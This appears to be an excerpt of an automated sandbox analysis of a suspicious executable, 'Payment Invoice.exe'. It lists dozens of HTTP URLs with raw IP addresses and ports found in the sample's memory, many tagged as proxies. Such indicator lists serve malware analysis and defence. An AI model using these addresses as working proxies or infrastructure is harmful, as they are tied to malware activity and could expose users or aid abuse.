                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.251:10010
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.251:100100q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.251:10010://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.251:9401
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.251:9401://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163181BB000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163181FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.135.119.4:6666
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163181DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.135.119.4:6666://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:13305
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:13305://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:23998
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:23998://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:31907
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:31907://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:54209
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:54209://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:56350
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.53:56350://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:2536
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:2536://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:58842
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:58842://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:12446
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:12446://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:16203
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:16203://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:2906
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:2906://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:29544
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:29544://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:4734
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:4734://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.125:15811
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.125:15811://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319934000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.183:2792
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.183:2792://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.183:45012
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.183:45012://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317ACC000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.198:3950
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.198:3950://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:48623
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:48623://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:63212
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:632120q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:63212://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:3260://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:36111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:36111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:42312
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:42312://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:4833
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:4833://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:60069
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:60069://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.130.120
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.130.120://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.102.130.120:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.126.101.162:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.126.101.162:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.202.91.219
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.202.91.219://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.202.91.219:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.210.235.107:8118
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.210.235.107:8118://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.28.155.28:62963
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.28.240.100:10403
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.28.240.100:10403://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.207.196.77:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.207.196.77:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.236.106.236:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.236.106.236:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.22.181.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.22.181.205:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.22.181.205:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D75000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.236.39.7:58266
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://151.236.39.7:58266://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.136.151.195:2080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.136.151.195:2080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.230.215.123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.230.215.123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.230.215.123:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631871B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.130.117:18080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.130.117:18080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.132.220:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.78.24:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://152.32.78.24:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.139.233.218:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://153.139.233.218:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.113.121.60
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.113.121.60://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.113.121.60:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.118.228.212
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.118.228.212://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.118.228.212:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.178.107:29985
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.12.178.107:29985://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.126.81.163:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.126.81.163:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.16.116.166:2512
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.16.116.166:2512://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.16.116.166:39759
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.16.116.166:39759://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.205.152.96:9080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.205.152.96:9080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.208.10.126
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.208.10.126://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.208.10.126:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.236.179.226:1981
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.236.179.226:1981://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.239.3.185:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.239.3.185:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.64.219.2:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.64.219.2:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.65.39.7
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.65.39.7://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.65.39.7:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.65.39.8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.65.39.8://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.65.39.8:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.66.108.9:10081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.66.108.9:10081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.72.90.74:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.72.90.74:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.73.28.157:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.73.28.157:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.73.29.129:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.73.29.129:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.73.29.161:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.73.29.161:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.79.246.18:9898
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.79.246.18:9898://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.79.254.236:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.79.254.236:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.83.29.105:3030
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.83.29.105:3030://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.185.15.56:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.185.15.56:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.213.149:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.213.149:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.215.37:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.215.37:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.241.99:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.241.99:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.71:1981
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.71:1981://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.232.9.194:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.232.9.194:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.214.232
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.214.232://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.214.232:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.217.159
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.217.159://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.217.159:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.56.40:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.56.40:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.6.202:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.6.202:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.63.69:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.63.69:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.159.10.86
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.159.10.86://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.159.10.86:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.245.131.28:30422
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.245.131.28:30422://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.25.92.74:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.25.92.74:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.113.18
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319647000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.113.18://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.113.18:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.247.207.153:3030
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.247.207.153:3030://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.215.50:11857
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.112.141.44:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.112.141.44:8080://proxy
